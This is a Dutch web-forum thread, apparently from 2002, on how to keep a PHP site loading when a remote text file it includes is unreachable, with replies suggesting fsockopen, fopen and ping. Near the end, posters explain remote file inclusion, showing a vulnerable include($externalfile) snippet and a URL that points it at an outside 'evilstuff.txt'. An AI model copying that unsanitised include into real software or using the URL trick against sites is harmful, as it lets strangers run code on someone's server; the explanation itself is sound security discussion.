Toon posts:

Check if server is up {pHp}

Pagina: 1
Acties:

Verwijderd

Topicstarter
Hey

ik heb een op een site een java-banner staan met een tekst op die ik van een local server haal.
de tekst haal ik van een tekst-file online met de 'include'-functie van php.

nu is er 1 probleem: wanneer de pc waarvan de tekst afgehaald wordt crasht, zonder stroom of i'net zit dan wil de hele site niet meer laden door de include-functie.
is er een manier om te checken of een bepaalde server 'up' is met php of de time-out van de include-functie te verlagen?

bedankt!

Verwijderd

gebruik fopen of fsockopen, check of de file handler klopt...

Verwijderd

Om de evt. error te onderdrukken moet je er dan wel een @ voorzetten.

Verwijderd

Gewoon dat IP eerst pingen ?

Verwijderd

fsockopen gebruiken... werkt perfect! Gebruik hetzelfde voor www.debosaapjes.com

Verwijderd

als je slim bent gebruik je geen include maar gewoon socket functies om text op te halen. iets minder security problemen (remote include is nog wel es wat insecure als je niet goed oppast)

daarnaast kan je een timeout etc zetten op zon fopen/fsockopen (alleen op linux dacht ik)

Verwijderd

Kan ook maar het is makkelijker om idd te kijken of een fsockopen lukt, zo jah, is de server up.

Verwijderd

TheViP:
(remote include is nog wel es wat insecure als je niet goed oppast)

Oh, geef eens een voorbeeld dan.

• brammetje
  • Registratie: Oktober 2000
  • Laatst online: 12-01-2025
Verwijderd schreef op 01 september 2002 @ 21:30:
TheViP:
(remote include is nog wel es wat insecure als je niet goed oppast)

Oh, geef eens een voorbeeld dan.
het remote-bestand kan wel eens php-code gaan bevatten welke uitgevoerdt word op jouw server...

• CyeZ
  • Registratie: September 2001
  • Laatst online: 01-09 14:35

CyeZ

Vroem vroem!!!

brammetje schreef op 01 september 2002 @ 21:31:
[...]

het remote-bestand kan wel eens php-code gaan bevatten welke uitgevoerdt word op jouw server...
Als jij een .php file included van een andere server dan wordt die php file ook op die andere server uitgevoert en krijg jij alleen de uitvoer van het betreffende .php script terug.
Het gevaar ligt er in als je een .txt van een andere server include dan kan die dus wel gewoon php coding terug geven aan jouw script wat dan vervolgens ook daadwerkelijk wordt uitgevoert.

Voorbeeld van een gevaarlijke include:

PHP:
1
2
3
<?
include($externalfile);
>?

waarbij die php dan op een soortgelijke manier wordt aangeroepen:
http://www.site.nl/securi...deresite.nl/evilstuff.txt

Op die manier kan dus iedereen code uitvoeren op de www.site.nl pagina.

[18:54] <Prammenhanger> |HunterPro|eet
[18:55] <Prammenhanger> lijkt best op
[18:55] <Prammenhanger> |HunterProFeet

Pagina: 1